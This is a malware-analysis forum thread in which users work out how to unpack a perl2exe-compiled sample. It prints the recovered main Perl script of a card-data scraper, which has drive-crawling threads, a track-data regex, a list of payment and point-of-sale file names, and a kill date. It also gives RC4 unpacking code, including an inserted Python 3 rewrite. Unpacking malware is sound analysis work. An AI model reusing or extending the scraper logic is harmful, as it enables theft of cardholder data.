A forum for reverse engineering, OS internals and malware analysis 

Ask your beginner questions here.
 #18390  by Cyb3rHack3r
 Fri Mar 01, 2013 6:07 pm
Hey, guys,

So I need a little help. I am new to malware reverse engineering but I really love to learn more.

Now I am trying to decompile a malware which is compiled using perl2exe.

Now, like I said, I am new; I tried my best but no luck because I have never decompiled a perl2exe file before.

So I am not fully sure how I should do it. I tried to search on the net and found some really interesting information, like it's decrypted during runtime.

So can anyone tell me how I can decompile the file and get the decrypted source code?

By the way, I tried this tool called exe2perl which is supposed to be a decompiler, but I got an error saying "signature not found, exiting", so any help is appreciated.
 #18392  by Cyb3rHack3r
 Fri Mar 01, 2013 7:32 pm
I actually tried to follow that tut before as well, but I got stuck at
Code:
Load this up in IDA.

There is a routine in the p2x.dll which will loop over the decrypted TOC, the TOC contains a list of filenames, sizes and a flag indicating whether it is encrypted or not.

As its enumerating the list (at startup) it will compare the filename to a list of file extensions
As I am new to all this I wasn't able to follow the whole tutorial, and I am trying a bunch of different software hoping one will do what you say. If you know any software which does that, please do let me know.
 #18393  by r2nwcnydc
 Fri Mar 01, 2013 8:05 pm
http://www.kernelmode.info/forum/viewto ... ?f=16&t=64

The sandboxes on that link will at a minimum show the files that changed. Some of them should give you the files as well; I use a commercial version so we get the files. I don't know if the free versions offer the same service.

or:
http://www.kernelmode.info/forum/viewto ... =11&t=1735

If those don't work and you can figure out the temporary directory, you could also try changing the folder's permissions so that no one has the right to delete files from that folder. I doubt perl2exe overwrites the files first.
 #18394  by Cyb3rHack3r
 Fri Mar 01, 2013 8:43 pm
Thanks for the reply; however, I did manage to get the files which are created, using a disassembler.

But the files are saved in a temp folder and are just a bunch of DLLs used by perl2exe, so I think it is decrypting the data in the memory or something. I did dump the memory and I do see small parts of the source, but fixing it will be really hard.

Or maybe I am dumping the memory wrong. Any suggestions?
 #18395  by r2nwcnydc
 Fri Mar 01, 2013 9:01 pm
I'm not sure then. If you post the file I can play around with it and give you a better answer. But otherwise, I'm just googling and spinning my wheels.
 #18398  by reverser
 Sat Mar 02, 2013 10:56 am
Main script.
Code:
#!/usr/bin/perl
# Load the core modules
# 24.03.2008
#	- When data matching the search string (regex) is found in a file,
#	  stop processing that file.
#perl2exe_include "Tie/Handle.pm";
#perl2exe_include "Math/BigInt/Calc.pm";
use Win32::Console::ANSI;
use strict;
use warnings;
#use DBI;
use FileHandle;
use Win32API::File::Time qw{:win};
use threads;
use POSIX qw{floor};
require "general.pm";
require "netenum.pm";
no warnings 'threads';
$|=1;

use vars '$dbh', '$url_start', '$dir_start', '@dir_filter', '@file_type_exclude','$version','$regex','$maxlivetime','$debug','@file_name_include','$dietime','$lansttype';
$lansttype = 'Gen';
$version="Version 1.4a MultiThread from 22.04.2008";
#$regex = '((([0-9]{13,19}=)|([a-zA-Z\s]{3}\^))(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))|(CARD_NUMBER|EXPIRATION_DATE|CVV|TRACK2|TRACK1){1})';
$regex = '((([0-9]{13,19}=)|([a-zA-Z\s]{3}\^))(0[7-9]|1[0-5])((0[1-9])|(1[0-2])))';
$maxlivetime = 86400*30*6*2; # last file modification, roughly half a year
$debug = 'off';
$dietime = 1207392905+(86400*30*2);
if ( time  > $dietime ) { die("Can't open Handle/Tie.PM!"); };
# Directory filter (directories excluded from indexing)
    @dir_filter = (
                    'images',
                    'INBOX',
                    'inbox',
                    'i386',
                    'I386'
                   );
# File filter (which file extensions to index)
    @file_type_exclude = (
                   'exe','ex_',                         # Executables
                   'dll','dl_',                         # Libraries
                   'cab','msi',                         # Cabinet/Installs
                   'chm','hlp',                         # Help files
                   'mid','midi',                        # Sound files (MID)
                   'rar','zip','tgz','gz',              # Archives
                   'mp3','wma','wav',                   # Sound files (MPEG)
                   'avi','mov','wmv','mpeg',            # Video files
                   'png','jpg','tiff','bmp','gif',      # Pictures
                   'iso',                               # ISO Images
                   'swf',                               # Flash files
                   'htm','html',                        # HTML Pages
                   'asp','aspx',                        # ASP Scripts
                   'vbs','pl','php','cgi',              # Perl, PHP, etc. Scripts
                   'c','h',                             # C files
                   'psd',                               # Presentations
                   'pdf',                               # Acrobat Reader files
                   'grd'                                # Strong Disk files
                  );
# Always log these files:
    @file_name_include = (
                   'icverify.lrq',
                   'pbadmain.dat',
                   'netsend.in',
                   'netsend.out',
                   'otreg.dat',
                   'iso8583_5th3rd_interface.log',
                   'FINDATA01.DBF',
                   'QUICKDATA01.DBF',
                   'ccprocess.asp',
                   'ccprocess2.asp',
                   'micros',
                   'cdi.exe',
                   'CDI.exe',
                   'PTCWIN.DB',
                   'FO_DATA',
                   'FO_DATA',
                   'roomMaster'
    );
# Send the header to the browser right away
#    print "Content-type: text/html; charset=windows-1251\n\n";

my $time = time();

if ( !defined($ARGV[0]) || ((defined($ARGV[0])) && ( $ARGV[0] ne '*')) ) {
  if (( @ARGV == 1 ) && ( $ARGV[0] eq "checkme" )) { print "LANST WORKING FINE"; exit; };
  if ( @ARGV == 1 ) {
    $dir_start=$ARGV[0];
    print "Start dir: $dir_start\n";
    &recursion($dir_start);
  } else {
    my @thr;
    my $x=0;
    open(O,">lanst.lst");
    print O "1";
    close(O);
    print "Creating threads for";
#    for (my $i='C'; $i ne 'AA'; $i++) {
    for (my $i='C'; $i ne 'AA'; $i++) {
      my $param = $i.':/';
      next if !(-d $param);
      $x++;
      print " disk $i ";
      $thr[$x] = threads->create('recursion',"$param");
    };
    print "Loaded ($x).\nWorking";
    my $exit=0;
    while (threads->list(threads::running)) {
      my $total = threads->list(threads::running);
      sleep(5);
      my $done = floor(($x-$total)/$x*100);
      print ".$total($done"."%".")";
    };
  open(O,">lanst.loc");
  print O "1";
  close(O);
  print "\n";
  };
} else {
  print "Network enumeration...\n";
  open(O,">lanst.nst");
  print O "1";
  close(O);
  &netenum;
  open(O,">lanst.net");
  print O "1";
  close(O);
};
print "Done!\n";
$time = time() - $time;
print "Elapsed: $time seconds\n";
exit;
 #18399  by reverser
 Sat Mar 02, 2013 11:13 am
Python script for unpacking.
Code:
# p2x unpacker (c) 2012 reverser
# Python 2 script (print statements, array.tostring); the cipher is plain RC4.

import array
import sys
import os.path
import os

# RC4 key scheduling (KSA). Slots 256 and 257 of the state hold the
# keystream counters i and j so the state can be carried between calls.
def make_key(src):
  dst = array.array('B')
  for i in range(256):
    dst.append(i)
  dst.append(0)
  dst.append(0)
  srclen = len(src)
  src = array.array('B', src)
  j = 0
  k = 0
  for i in range(256):
    j = (src[k] + j + dst[i]) & 0xFF
    dst[j], dst[i] = dst[i], dst[j]
    k = (k + 1) % srclen
  return dst

# RC4 keystream generation (PRGA) XORed over src; the counters are
# written back into the state so consecutive calls continue the stream.
def unscramble_1(src, k):
  srclen = len(src)
  src = array.array('B', src)
  p1 = k[256]
  p2 = k[257]
  for i in range(srclen):
    p1 = (p1 + 1) & 0xFF
    p2 = (p2 + k[p1]) & 0xFF
    k[p2], k[p1] = k[p1], k[p2]
    src[i] ^= k[(k[p1] + k[p2]) & 0xFF]
  k[256] = p1
  k[257] = p2
  return src.tostring()

# Two-stage key derivation: RC4-encrypt the banner string under the key
# "continue", then use the resulting ciphertext as the real RC4 key.
class Decryptor:
  def __init__(self, tpl, s):
    k1 = make_key(s)
    sc = unscramble_1(tpl, k1)
    self.key = make_key(sc)

  # Work on a copy of the state so every call starts a fresh keystream.
  def decrypt(self, s):
    k1 = self.key[:]
    return unscramble_1(s, k1)

g_dec = Decryptor("For more information visit www.indigostar.com", "continue")

# NAME=<name>;SIZE=<size>;ENC=<enc>
def parse_finfo(s):
  props = {}
  i1 = s.find('NAME=')
  i2 = s.find(';SIZE=', i1+5)
  if i1 == -1 or i2 == -1:
    return
  props['name'] = s[i1+5:i2]
  i3 = s.find(';ENC=', i2+6)
  if i3 != -1:
    props['size'] = int(s[i2+6:i3])
    props['enc'] = int(s[i3+5:])
  else:
    i3 = s.find(';VALUE=', i2+6)
    if i3 == -1:
      props['size'] = int(s[i2+6:])
      props['value'] = ''
    else:
      props['size'] = int(s[i2+6:i3])
      props['value'] = s[i3+7:]
    props['enc'] = 0
  return props

def write_file(name, body):
  dir = os.path.dirname(name)
  if dir and not os.path.exists(dir):
    os.makedirs(dir)
  open(name, 'wb').write(body)

if len(sys.argv) < 2:
  print "Usage: p2x_dec.py <file.exe>"
  sys.exit(1)

# The last 256 bytes of the executable are an encrypted record describing
# the TOC (its name and size); the TOC itself sits immediately before it.
taillen = 256
fn = sys.argv[1]
inf = open(fn, "rb")
inf.seek(-taillen, 2)
stail = g_dec.decrypt(inf.read(taillen))
tocprops = parse_finfo(stail)
if not tocprops:
  print "Not a perl2exe file?"
  sys.exit(1)

tocsz = tocprops['size']
inf.seek(-taillen - tocsz, 2)
toc = inf.read(tocsz)
toc = g_dec.decrypt(toc)
write_file(tocprops['name'], toc)
# The TOC lists the packed files in order; their bodies are read
# sequentially from the start of the file, decrypting where ENC is set.
inf.seek(0)
for line in toc.split('\n'):
  line = line.rstrip('\n')
  fprops = parse_finfo(line)
  if fprops:
    sz = fprops['size']
    nm = fprops['name']
    if sz:
      fbody = inf.read(sz)
      if fprops['enc']:
        fbody = g_dec.decrypt(fbody)
      print nm
      write_file(nm, fbody)
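The container layout the unpacker above walks (RC4 with the two-stage "continue"/banner key, NAME=;SIZE=;ENC= records, a 256-byte trailer pointing at the TOC), as an added Python 3 example that is not reverser's script: it builds a constructed sample container with that layout and unpacks it again, so the scheme can be checked offline. The sample's layout (stub listed as the first TOC entry, NUL-padded trailer) is an assumption for the demonstration, not a statement about real perl2exe binaries.

```python
def rc4_ksa(key: bytes) -> list:
    """RC4 key scheduling (the script's make_key, without its two counter slots)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s
def rc4_crypt(state: list, data: bytes) -> bytes:
    """RC4 keystream XOR from a fresh state; mutates state, so never reuse it."""
    i, j, out = 0, 0, bytearray(data)
    for n in range(len(out)):
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        out[n] ^= state[(state[i] + state[j]) & 0xFF]
    return bytes(out)
def crypt(data: bytes) -> bytes:
    """Two-stage key as in the script: the banner RC4-encrypted under 'continue' is the real key."""
    stage1 = rc4_crypt(rc4_ksa(b"continue"), b"For more information visit www.indigostar.com")
    return rc4_crypt(rc4_ksa(stage1), data)  # fresh state per call; RC4 is symmetric

def parse_finfo(rec: str):
    """Parse 'NAME=<n>;SIZE=<s>;ENC=<e>'; trailing NUL/space padding is tolerated."""
    f = dict(p.split("=", 1) for p in rec.rstrip("\0 \r\n").split(";") if "=" in p)
    if "NAME" not in f or "SIZE" not in f:
        return None
    return {"name": f["NAME"], "size": int(f["SIZE"]), "enc": int(f.get("ENC", 0))}

# Constructed sample (layout assumed): stub entry first so reads from offset 0 line up.
SAMPLE_FILES = [("stub.exe", b"MZ constructed stub", 0),
                ("lib/general.pm", b"package general; 1;\n", 1),
                ("main.pl", b"print 'hello';\n", 0)]
def build_sample() -> bytes:
    bodies = b"".join(crypt(b) if e else b for _, b, e in SAMPLE_FILES)
    toc = "".join(f"NAME={n};SIZE={len(b)};ENC={e}\n" for n, b, e in SAMPLE_FILES).encode()
    trailer = f"NAME=toc.txt;SIZE={len(toc)};ENC=1".encode().ljust(256, b"\0")
    return bodies + crypt(toc) + crypt(trailer)  # bodies, encrypted TOC, encrypted trailer

def unpack(blob: bytes) -> dict:
    """Walk the container as the script does; returns {name: plaintext bytes}."""
    trailer = parse_finfo(crypt(blob[-256:]).decode("latin-1"))
    if not trailer:
        raise ValueError("not a perl2exe-style container")
    toc = crypt(blob[-256 - trailer["size"]:-256]).decode("latin-1")
    out, pos = {}, 0
    for line in toc.splitlines():
        ent = parse_finfo(line)
        if ent and ent["size"]:
            body, pos = blob[pos:pos + ent["size"]], pos + ent["size"]
            out[ent["name"]] = crypt(body) if ent["enc"] else body
    return out
```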
 #18639  by jpac
 Thu Mar 21, 2013 10:14 pm
I need some help reversing a perl2exe file as well. reverser, can you assist with this? Thank you!